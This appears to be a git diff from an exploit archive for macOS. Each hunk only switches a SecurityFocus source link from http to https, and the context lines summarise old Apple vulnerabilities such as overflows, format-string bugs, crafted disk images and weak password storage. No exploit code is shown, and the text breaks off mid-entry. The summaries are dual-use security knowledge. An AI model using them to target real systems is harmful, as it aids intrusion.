vulnerability has been reported for Apple QuickTime/Darwin Streaming Server. The problem is said to occur within the QTSSReflector module while processing the ANNOUNCE command. Specifically, by specifying an extremely large value as an argument within an ANNOUNCE request, it is possible to trigger an unexpected calculation causing the server to crash. diff --git a/exploits/osx/dos/23442.txt b/exploits/osx/dos/23442.txt index 4d6b73679..acc622b18 100644 --- a/exploits/osx/dos/23442.txt +++ b/exploits/osx/dos/23442.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9228/info +source: https://www.securityfocus.com/bid/9228/info The cd9660.util utility has been reported prone to a local buffer overrun vulnerability. Excessive data supplied as an argument for the probe for mounting switch, passed to the cd9660.util utility will overrun the bounds of a reserved buffer in memory. Because memory adjacent to this buffer has been reported to contain saved values that are crucial to controlling execution flow, a local attacker may potentially influence cd9660.util execution flow into attacker-supplied instructions. diff --git a/exploits/osx/dos/23505.c b/exploits/osx/dos/23505.c index 8636ad1d6..78b764e30 100644 --- a/exploits/osx/dos/23505.c +++ b/exploits/osx/dos/23505.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9332/info +// source: https://www.securityfocus.com/bid/9332/info Apple MacOS X SecurityServer has been reported prone to a denial of service vulnerability that may be triggered by a local user. The issue may be triggered under certain circumstances when a large password for a SecKeychainUnlock() call is specified under certain circumstances. diff --git a/exploits/osx/dos/23793.txt b/exploits/osx/dos/23793.txt index 9893a2029..d0579b273 100644 --- a/exploits/osx/dos/23793.txt +++ b/exploits/osx/dos/23793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9815/info +source: https://www.securityfocus.com/bid/9815/info Apple Safari Web Browser is reported to be prone to a security vulnerability related to handling of large JavaScript arrays (with 99999999999999999999999 or 0x23000000 elements). By declaring such an array and then attempting to access it, it may be possible to cause a browser crash. diff --git a/exploits/osx/dos/24780.html b/exploits/osx/dos/24780.html index 32a93efae..27526ddf4 100644 --- a/exploits/osx/dos/24780.html +++ b/exploits/osx/dos/24780.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11759/info +source: https://www.securityfocus.com/bid/11759/info Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed. diff --git a/exploits/osx/dos/24843.txt b/exploits/osx/dos/24843.txt index fae172933..ac58c9b4e 100644 --- a/exploits/osx/dos/24843.txt +++ b/exploits/osx/dos/24843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11949/info +source: https://www.securityfocus.com/bid/11949/info A vulnerability has been identified in Apple Safari Web Browser that allows an attacker to misrepresent the status bar in the browser, allowing vulnerable users to be mislead into following a link to a malicious site. diff --git a/exploits/osx/dos/26128.html b/exploits/osx/dos/26128.html index e31ea61f7..b83fe8fc2 100644 --- a/exploits/osx/dos/26128.html +++ b/exploits/osx/dos/26128.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14528/info +source: https://www.securityfocus.com/bid/14528/info Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs certain JavaScript operations. diff --git a/exploits/osx/dos/26271.txt b/exploits/osx/dos/26271.txt index ad9714497..bb1ff93ed 100644 --- a/exploits/osx/dos/26271.txt +++ b/exploits/osx/dos/26271.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14868/info +source: https://www.securityfocus.com/bid/14868/info Apple Safari is prone to a memory corruption vulnerability. This issue is exposed when the browser opens specific 'data:' URIs, causing the browser to crash. diff --git a/exploits/osx/dos/26292.html b/exploits/osx/dos/26292.html index caa0f9cbd..0354920a7 100644 --- a/exploits/osx/dos/26292.html +++ b/exploits/osx/dos/26292.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14899/info +source: https://www.securityfocus.com/bid/14899/info Microsoft Internet Explorer for Mac OS is prone to a denial of service vulnerability. This issue occurs when Internet Explorer attempts to render a Web page with malformed content. diff --git a/exploits/osx/dos/26971.txt b/exploits/osx/dos/26971.txt index f92c2c6cc..a6f4e6fb1 100644 --- a/exploits/osx/dos/26971.txt +++ b/exploits/osx/dos/26971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16045/info +source: https://www.securityfocus.com/bid/16045/info Apple Mac OS X KHTMLParser is affected by a remote denial of service vulnerability. diff --git a/exploits/osx/dos/27714.txt b/exploits/osx/dos/27714.txt index f98c31420..8085c24f9 100644 --- a/exploits/osx/dos/27714.txt +++ b/exploits/osx/dos/27714.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17634/info +source: https://www.securityfocus.com/bid/17634/info Apple Mac OS X is reported prone to multiple security vulnerabilities. diff --git a/exploits/osx/dos/27715.txt b/exploits/osx/dos/27715.txt index d36b70f5b..d4ebff305 100644 --- a/exploits/osx/dos/27715.txt +++ b/exploits/osx/dos/27715.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17634/info +source: https://www.securityfocus.com/bid/17634/info Apple Mac OS X is reported prone to multiple security vulnerabilities. diff --git a/exploits/osx/dos/27790.txt b/exploits/osx/dos/27790.txt index 5a3c53f0d..9376020a1 100644 --- a/exploits/osx/dos/27790.txt +++ b/exploits/osx/dos/27790.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17768/info +source: https://www.securityfocus.com/bid/17768/info ImageIO is susceptible to a remote denial-of-service vulnerability. This issue is do to a failure to properly process malicious OpenEXR image files. diff --git a/exploits/osx/dos/28135.pl b/exploits/osx/dos/28135.pl index e190014d3..068d9fb91 100755 --- a/exploits/osx/dos/28135.pl +++ b/exploits/osx/dos/28135.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18728/info +source: https://www.securityfocus.com/bid/18728/info Mac OS X Open Directory Server is prone to a denial-of-service vulnerability because it fails to handle exceptional conditions. diff --git a/exploits/osx/dos/28165.html b/exploits/osx/dos/28165.html index 55f13de31..1f02d4808 100644 --- a/exploits/osx/dos/28165.html +++ b/exploits/osx/dos/28165.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18822/info +source: https://www.securityfocus.com/bid/18822/info Apple Safari web browser is prone to a denial-of-service vulnerability when parsing certain malformed DHTML elements. diff --git a/exploits/osx/dos/28521.txt b/exploits/osx/dos/28521.txt index 8c46d20e5..f56777e7c 100644 --- a/exploits/osx/dos/28521.txt +++ b/exploits/osx/dos/28521.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19976/info +source: https://www.securityfocus.com/bid/19976/info Apple QuickTime is prone to multiple vulnerabilities because it fails to properly bounds-check and sanitize user-supplied data. diff --git a/exploits/osx/dos/28578.txt b/exploits/osx/dos/28578.txt index 2cb026848..85c3db42c 100644 --- a/exploits/osx/dos/28578.txt +++ b/exploits/osx/dos/28578.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20034/info +source: https://www.securityfocus.com/bid/20034/info Apple Mac OS X kextload is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied data before copying it to a finite-sized memory buffer. diff --git a/exploits/osx/dos/28948.c b/exploits/osx/dos/28948.c index da63317e7..05818de82 100644 --- a/exploits/osx/dos/28948.c +++ b/exploits/osx/dos/28948.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20982/info +// source: https://www.securityfocus.com/bid/20982/info Apple Mac OS X is prone to a local denial-of-service vulnerability because the kernel fails to properly handle the execution of a system call. diff --git a/exploits/osx/dos/29007.html b/exploits/osx/dos/29007.html index 92259ca40..ea8242942 100644 --- a/exploits/osx/dos/29007.html +++ b/exploits/osx/dos/29007.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21053/info +source: https://www.securityfocus.com/bid/21053/info Apple Safari web browser is prone to a denial-of-service vulnerability when executing certain JavaScript code. diff --git a/exploits/osx/dos/29144.txt b/exploits/osx/dos/29144.txt index a5946a1f8..c594cf04b 100644 --- a/exploits/osx/dos/29144.txt +++ b/exploits/osx/dos/29144.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21201/info +source: https://www.securityfocus.com/bid/21201/info Apple Mac OS X is prone to a remote denial-of-service vulnerability when handling specially crafted UDIF disk image files. diff --git a/exploits/osx/dos/29161.txt b/exploits/osx/dos/29161.txt index 2b46b83be..f428b4291 100644 --- a/exploits/osx/dos/29161.txt +++ b/exploits/osx/dos/29161.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21236/info +source: https://www.securityfocus.com/bid/21236/info Apple Mac OS X is prone to a remote denial-of-service vulnerability when handling specially crafted UDTO disk image files. diff --git a/exploits/osx/dos/29441.txt b/exploits/osx/dos/29441.txt index 35262f103..4486c49f1 100644 --- a/exploits/osx/dos/29441.txt +++ b/exploits/osx/dos/29441.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21993/info +source: https://www.securityfocus.com/bid/21993/info Apple Mac OS X is prone to a remote integer-overflow vulnerability. This issue occurs when the UFS filesystem handler fails to handle specially crafted DMG images. diff --git a/exploits/osx/dos/29452.txt b/exploits/osx/dos/29452.txt index fc5146d22..debfdb187 100644 --- a/exploits/osx/dos/29452.txt +++ b/exploits/osx/dos/29452.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22036/info +source: https://www.securityfocus.com/bid/22036/info Apple Mac OS X is prone to a remote denial-of-service vulnerability. This issue occurs when the UFS filesystem handler fails to handle specially crafted DMG images. diff --git a/exploits/osx/dos/29454.txt b/exploits/osx/dos/29454.txt index 915dd973f..1fa97c06a 100644 --- a/exploits/osx/dos/29454.txt +++ b/exploits/osx/dos/29454.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22042/info +source: https://www.securityfocus.com/bid/22042/info Apple Mac OS X is prone to a denial-of-service vulnerability when handling a DMG image containing a specially crafted HFS+ filesystem. diff --git a/exploits/osx/dos/29461.txt b/exploits/osx/dos/29461.txt index f32ccd902..780d00d0e 100644 --- a/exploits/osx/dos/29461.txt +++ b/exploits/osx/dos/29461.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22059/info +source: https://www.securityfocus.com/bid/22059/info Apple WebKit is prone to a denial-of-service vulnerability. diff --git a/exploits/osx/dos/29509.txt b/exploits/osx/dos/29509.txt index 0c53e310c..d34964bb9 100644 --- a/exploits/osx/dos/29509.txt +++ b/exploits/osx/dos/29509.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22207/info +source: https://www.securityfocus.com/bid/22207/info Mac OS X QuickDraw is prone to a remote memory-corruption vulnerability because the software fails to properly handle malformed PICT image files. diff --git a/exploits/osx/dos/29523.txt b/exploits/osx/dos/29523.txt index 771819fdb..0a4653888 100644 --- a/exploits/osx/dos/29523.txt +++ b/exploits/osx/dos/29523.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22222/info +source: https://www.securityfocus.com/bid/22222/info Apple Software Update is prone to a format-string vulnerability. diff --git a/exploits/osx/dos/29532.txt b/exploits/osx/dos/29532.txt index c5f8d2324..6430bf052 100644 --- a/exploits/osx/dos/29532.txt +++ b/exploits/osx/dos/29532.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22272/info +source: https://www.securityfocus.com/bid/22272/info Apple Installer is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. diff --git a/exploits/osx/dos/29535.txt b/exploits/osx/dos/29535.txt index 9ed87101d..5dd5ce420 100644 --- a/exploits/osx/dos/29535.txt +++ b/exploits/osx/dos/29535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22286/info +source: https://www.securityfocus.com/bid/22286/info Flip4Mac is prone to a remote memory-corruption vulnerability. diff --git a/exploits/osx/dos/29551.txt b/exploits/osx/dos/29551.txt index ad834b959..b1129b7e7 100644 --- a/exploits/osx/dos/29551.txt +++ b/exploits/osx/dos/29551.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22326/info +source: https://www.securityfocus.com/bid/22326/info Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie. diff --git a/exploits/osx/dos/29553.txt b/exploits/osx/dos/29553.txt index aea6de871..bbfbb25dd 100644 --- a/exploits/osx/dos/29553.txt +++ b/exploits/osx/dos/29553.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22326/info +source: https://www.securityfocus.com/bid/22326/info Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie. diff --git a/exploits/osx/dos/29554.txt b/exploits/osx/dos/29554.txt index 28149ae23..6452a4f04 100644 --- a/exploits/osx/dos/29554.txt +++ b/exploits/osx/dos/29554.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22326/info +source: https://www.securityfocus.com/bid/22326/info Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie. diff --git a/exploits/osx/dos/29555.txt b/exploits/osx/dos/29555.txt index 7739f3fbf..c38a8063f 100644 --- a/exploits/osx/dos/29555.txt +++ b/exploits/osx/dos/29555.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22326/info +source: https://www.securityfocus.com/bid/22326/info Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie. diff --git a/exploits/osx/dos/29616.xml b/exploits/osx/dos/29616.xml index c720d09e7..b5f7e3e6d 100644 --- a/exploits/osx/dos/29616.xml +++ b/exploits/osx/dos/29616.xml @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22615/info +source: https://www.securityfocus.com/bid/22615/info Apple iTunes is prone to a remote denial-of-service vulnerability because the application fails to handle malformed XML playlist files. diff --git a/exploits/osx/dos/29620.txt b/exploits/osx/dos/29620.txt index 4b2b548e9..deac41de8 100644 --- a/exploits/osx/dos/29620.txt +++ b/exploits/osx/dos/29620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22630/info +source: https://www.securityfocus.com/bid/22630/info Apple Mac OS X ImageIO is prone to an integer-overflow vulnerability because it fails to handle specially crafted image files. diff --git a/exploits/osx/dos/31021.html b/exploits/osx/dos/31021.html index 4f0880557..172dfa352 100644 --- a/exploits/osx/dos/31021.html +++ b/exploits/osx/dos/31021.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27261/info +source: https://www.securityfocus.com/bid/27261/info Apple Safari is prone to a remote denial-of-service vulnerability. diff --git a/exploits/osx/dos/31619.ics b/exploits/osx/dos/31619.ics index 098c193bd..b937a5d37 100644 --- a/exploits/osx/dos/31619.ics +++ b/exploits/osx/dos/31619.ics @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28632/info +source: https://www.securityfocus.com/bid/28632/info Apple iCal is prone to a denial-of-service vulnerability because it fails to handle specially crafted files. diff --git a/exploits/osx/dos/31620.ics b/exploits/osx/dos/31620.ics index 0e29a5e8a..ee1fdd3b4 100644 --- a/exploits/osx/dos/31620.ics +++ b/exploits/osx/dos/31620.ics @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28633/info +source: https://www.securityfocus.com/bid/28633/info Apple iCal is prone to a denial-of-service vulnerability because it fails to adequately sanitize user-supplied input data. diff --git a/exploits/osx/dos/32136.html b/exploits/osx/dos/32136.html index 86daeda5e..8978de54d 100644 --- a/exploits/osx/dos/32136.html +++ b/exploits/osx/dos/32136.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30488/info +source: https://www.securityfocus.com/bid/30488/info Apple Mac OS X is prone to multiple memory-corruption vulnerabilities that affect the CoreGraphics component. diff --git a/exploits/osx/dos/32694.pl b/exploits/osx/dos/32694.pl index b1d6fb3bd..8096c709d 100755 --- a/exploits/osx/dos/32694.pl +++ b/exploits/osx/dos/32694.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33080/info +source: https://www.securityfocus.com/bid/33080/info Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library. diff --git a/exploits/osx/dos/32695.php b/exploits/osx/dos/32695.php index 1f46c0007..ffd4b3830 100644 --- a/exploits/osx/dos/32695.php +++ b/exploits/osx/dos/32695.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33080/info +source: https://www.securityfocus.com/bid/33080/info Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library. diff --git a/exploits/osx/dos/32817.txt b/exploits/osx/dos/32817.txt index 9d1dd59e4..30f9550f7 100644 --- a/exploits/osx/dos/32817.txt +++ b/exploits/osx/dos/32817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33909/info +source: https://www.securityfocus.com/bid/33909/info Apple Safari is prone to a denial-of-service vulnerability that stems from a NULL-pointer dereference. diff --git a/exploits/osx/dos/33235.rb b/exploits/osx/dos/33235.rb index c198b6524..babdfa7d1 100755 --- a/exploits/osx/dos/33235.rb +++ b/exploits/osx/dos/33235.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36478/info +source: https://www.securityfocus.com/bid/36478/info Apple iTunes is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/osx/dos/33337.c b/exploits/osx/dos/33337.c index 721350518..a8fa29fef 100644 --- a/exploits/osx/dos/33337.c +++ b/exploits/osx/dos/33337.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36915/info +// source: https://www.securityfocus.com/bid/36915/info Apple Mac OS X is prone to a local denial-of-service vulnerability that is caused by a race condition. diff --git a/exploits/osx/dos/33479.c b/exploits/osx/dos/33479.c index 255c6fdbe..574bfbfc0 100644 --- a/exploits/osx/dos/33479.c +++ b/exploits/osx/dos/33479.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37687/info +// source: https://www.securityfocus.com/bid/37687/info Mac OS X is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. diff --git a/exploits/osx/dos/36271.py b/exploits/osx/dos/36271.py index 6bfd25938..f9700a5d2 100755 --- a/exploits/osx/dos/36271.py +++ b/exploits/osx/dos/36271.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50446/info +source: https://www.securityfocus.com/bid/50446/info Apple Mac OS X and iOS are prone to a denial-of-service vulnerability. diff --git a/exploits/osx/local/19244.sh b/exploits/osx/local/19244.sh index 7d250748c..27774d856 100755 --- a/exploits/osx/local/19244.sh +++ b/exploits/osx/local/19244.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/306/info +source: https://www.securityfocus.com/bid/306/info A vulnerability in the MacOS X Server may crash it while under heavy load. diff --git a/exploits/osx/local/19417.txt b/exploits/osx/local/19417.txt index 4a8c90104..6dfcf5343 100644 --- a/exploits/osx/local/19417.txt +++ b/exploits/osx/local/19417.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/519/info +source: https://www.securityfocus.com/bid/519/info The encryption algorithm in MacOS system is simple and the password can be easily decoded. diff --git a/exploits/osx/local/19427.txt b/exploits/osx/local/19427.txt index 5df0e7173..07a8ddf7c 100644 --- a/exploits/osx/local/19427.txt +++ b/exploits/osx/local/19427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/531/info +source: https://www.securityfocus.com/bid/531/info At Ease 5.0 will allow a user to access any user's volume on the server through a web browser. diff --git a/exploits/osx/local/19434.txt b/exploits/osx/local/19434.txt index 7d04e0e4b..7c8f1eed9 100644 --- a/exploits/osx/local/19434.txt +++ b/exploits/osx/local/19434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/546/info +source: https://www.securityfocus.com/bid/546/info Internet Config is a third-party freeware utility for MacOS. It provides a means of centralizing frequently-required connection information, including passwords, for use by several programs. The passwords are stored in encrypted form in the Internet Preferences file in the Preferences folder. The encryption algorithm used is weak and easily broken. diff --git a/exploits/osx/local/19437.txt b/exploits/osx/local/19437.txt index 202c6221e..674741eaa 100644 --- a/exploits/osx/local/19437.txt +++ b/exploits/osx/local/19437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/551/info +source: https://www.securityfocus.com/bid/551/info Screen to Screen is a remote control utility for systems runnig MacOS. To use it, you need to have an administrator password. This password is stored in encrypted form in a file called "Authorization" located in the System Folder under Preferences:Power On Preferences:Screen To Screen. diff --git a/exploits/osx/local/19438.txt b/exploits/osx/local/19438.txt index 58ddca58e..22c1acb85 100644 --- a/exploits/osx/local/19438.txt +++ b/exploits/osx/local/19438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/552/info +source: https://www.securityfocus.com/bid/552/info Autothenticate is an extension for MacOS that remembers usernames and passwords from visited websites, and atomatically enters them when the site is visited again. It can be configured to store the username and password, the username only, or nothing. It stores this information in encrypted form in a preference file called "AutothenticatePreferences" located in the Preferences folder in the System Folder. The encryption mechanism used is weak and can be broken. diff --git a/exploits/osx/local/19439.txt b/exploits/osx/local/19439.txt index 2efe8d3fa..81fa25496 100644 --- a/exploits/osx/local/19439.txt +++ b/exploits/osx/local/19439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/553/info +source: https://www.securityfocus.com/bid/553/info On Guard, a security program for MacOS, includes an emergency password feature in the event that the administrative password is lost or forgotten. If the user name 'emergency' is entered, On Guard will generate an Emergency Code. The user must then call Power On Software, and after registration validation is done, provide the Emergency Code. Power On Software will then provide an emergency password. However, the method used to generate this emergency password has been reverse engineered, and an exploit is publicly available that will automatically generate the emergency password with no phone call. diff --git a/exploits/osx/local/21070.txt b/exploits/osx/local/21070.txt index 629358274..c16227412 100644 --- a/exploits/osx/local/21070.txt +++ b/exploits/osx/local/21070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3186/info +source: https://www.securityfocus.com/bid/3186/info A user who has set an Open Firmware password on their Apple system believes it to be safe when powered down. There is a tool that any user with access to the Finder can run in order to reveal the Open Firmware password without any decryption. diff --git a/exploits/osx/local/21076.txt b/exploits/osx/local/21076.txt index ea95cd454..c70f91d49 100644 --- a/exploits/osx/local/21076.txt +++ b/exploits/osx/local/21076.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3213/info +source: https://www.securityfocus.com/bid/3213/info Intego FileGuard is a commercial access control utility for Mac OS versions 7-9.1. It's functionality includes the ability to enforce privileges, log activities, manage user accounts, restrict access by time, etc. diff --git a/exploits/osx/local/21815.txt b/exploits/osx/local/21815.txt index 607678e54..79a2df740 100644 --- a/exploits/osx/local/21815.txt +++ b/exploits/osx/local/21815.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5768/info +source: https://www.securityfocus.com/bid/5768/info Mac OS X is the BSD-based operating system distributed and maintained by Apple. diff --git a/exploits/osx/local/24608.txt b/exploits/osx/local/24608.txt index f14c3cda3..aceb7aded 100644 --- a/exploits/osx/local/24608.txt +++ b/exploits/osx/local/24608.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11211/info +source: https://www.securityfocus.com/bid/11211/info It is reported that RsyncX is prone to a local privilege escalation vulnerability. diff --git a/exploits/osx/local/24609.txt b/exploits/osx/local/24609.txt index 7835e8151..20406c7ae 100644 --- a/exploits/osx/local/24609.txt +++ b/exploits/osx/local/24609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11212/info +source: https://www.securityfocus.com/bid/11212/info RsyncX is reported to contain an insecure temporary file creation vulnerability. The result of this is that temporary files created by the application may use predictable filenames. diff --git a/exploits/osx/local/25055.c b/exploits/osx/local/25055.c index a1a7091cb..5868dc059 100644 --- a/exploits/osx/local/25055.c +++ b/exploits/osx/local/25055.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/12314/info +source: https://www.securityfocus.com/bid/12314/info Reportedly a local integer overflow vulnerability affects the Darwin Kernel. This issue is due to a failure of the affected to properly handle integer signedness. diff --git a/exploits/osx/local/25256.c b/exploits/osx/local/25256.c index c5788af88..d873d711d 100644 --- a/exploits/osx/local/25256.c +++ b/exploits/osx/local/25256.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12863/info +// source: https://www.securityfocus.com/bid/12863/info Multiple security vulnerabilities are reported to affect Apple Mac OS X. These issues were disclosed in the referenced vendor advisory. diff --git a/exploits/osx/local/26185.txt b/exploits/osx/local/26185.txt index 34099285d..bb9a8d42b 100644 --- a/exploits/osx/local/26185.txt +++ b/exploits/osx/local/26185.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14630/info +source: https://www.securityfocus.com/bid/14630/info A vulnerability in Apple Directory Services allows unprivileged users to create or delete directory services idnetity accounts. diff --git a/exploits/osx/local/28576.txt b/exploits/osx/local/28576.txt index e91883c59..0c1c898ec 100644 --- a/exploits/osx/local/28576.txt +++ b/exploits/osx/local/28576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20031/info +source: https://www.securityfocus.com/bid/20031/info Apple Mac OS X 'kextload' is prone to a format-string vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/osx/local/29190.txt b/exploits/osx/local/29190.txt index 67e59a3e2..a28929531 100644 --- a/exploits/osx/local/29190.txt +++ b/exploits/osx/local/29190.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21291/info +source: https://www.securityfocus.com/bid/21291/info Apple Mac OS X is prone to a local integer-overflow vulnerability. This issue occurs when the operating system fails to handle specially crafted binaries. diff --git a/exploits/osx/local/29194.c b/exploits/osx/local/29194.c index e9c8122ca..5dcefac6a 100644 --- a/exploits/osx/local/29194.c +++ b/exploits/osx/local/29194.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21317/info +// source: https://www.securityfocus.com/bid/21317/info Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue occurs when the operating system fails to handle specially crafted arguments to an IOCTL call. diff --git a/exploits/osx/local/29201.c b/exploits/osx/local/29201.c index 858ed596c..e6f34b35f 100644 --- a/exploits/osx/local/29201.c +++ b/exploits/osx/local/29201.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/21349/info +source: https://www.securityfocus.com/bid/21349/info Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue occurs when the operating system fails to handle specially crafted arguments to a system call. diff --git a/exploits/osx/local/29950.js b/exploits/osx/local/29950.js index 82554a37b..c1faf0352 100644 --- a/exploits/osx/local/29950.js +++ b/exploits/osx/local/29950.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23825/info +source: https://www.securityfocus.com/bid/23825/info Apple Safari is prone to an unspecified local vulnerability. diff --git a/exploits/osx/local/30096.txt b/exploits/osx/local/30096.txt index 39beaebf5..f4a9a0f4a 100644 --- a/exploits/osx/local/30096.txt +++ b/exploits/osx/local/30096.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24208/info +source: https://www.securityfocus.com/bid/24208/info Apple Mac OS X's VPN service daemon is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. diff --git a/exploits/osx/local/31940.txt b/exploits/osx/local/31940.txt index a30a6ad20..aa679429e 100644 --- a/exploits/osx/local/31940.txt +++ b/exploits/osx/local/31940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29831/info +source: https://www.securityfocus.com/bid/29831/info Mac OS X is prone to a local privilege-escalation vulnerability affecting ARDAgent (Apple Remote Desktop). diff --git a/exploits/osx/local/35488.c b/exploits/osx/local/35488.c index aa96d026a..45b336681 100644 --- a/exploits/osx/local/35488.c +++ b/exploits/osx/local/35488.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46982/info +// source: https://www.securityfocus.com/bid/46982/info Apple Mac OS X is prone to a local information-disclosure vulnerability because of an integer-overflow error in the HFS subsystem. diff --git a/exploits/osx/local/36143.txt b/exploits/osx/local/36143.txt index cef7fad14..7154bdc40 100644 --- a/exploits/osx/local/36143.txt +++ b/exploits/osx/local/36143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49676/info +source: https://www.securityfocus.com/bid/49676/info Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities. diff --git a/exploits/osx/local/39147.c b/exploits/osx/local/39147.c index 0dfe6fa45..cee1a5394 100644 --- a/exploits/osx/local/39147.c +++ b/exploits/osx/local/39147.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67023/info +// source: https://www.securityfocus.com/bid/67023/info Apple Mac OS X is prone to a local security-bypass vulnerability. diff --git a/exploits/osx/local/4759.c b/exploits/osx/local/4759.c index 331ab85bb..2659ae1e4 100644 --- a/exploits/osx/local/4759.c +++ b/exploits/osx/local/4759.c @@ -8,7 +8,7 @@ * http://seclists.org/fulldisclosure/2007/Dec/0445.html * http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=633 * http://phrack.org/issues.html?issue=64&id=11#article - * BID: http://www.securityfocus.com/bid/26926 + * BID: https://www.securityfocus.com/bid/26926 * * * Notes: diff --git a/exploits/osx/remote/20911.txt b/exploits/osx/remote/20911.txt index 4e562a8b8..127f76d88 100644 --- a/exploits/osx/remote/20911.txt +++ b/exploits/osx/remote/20911.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2852/info +source: https://www.securityfocus.com/bid/2852/info A vulnerability exists when Apache webserver is used with Mac OS X Client. diff --git a/exploits/osx/remote/20984.txt b/exploits/osx/remote/20984.txt index 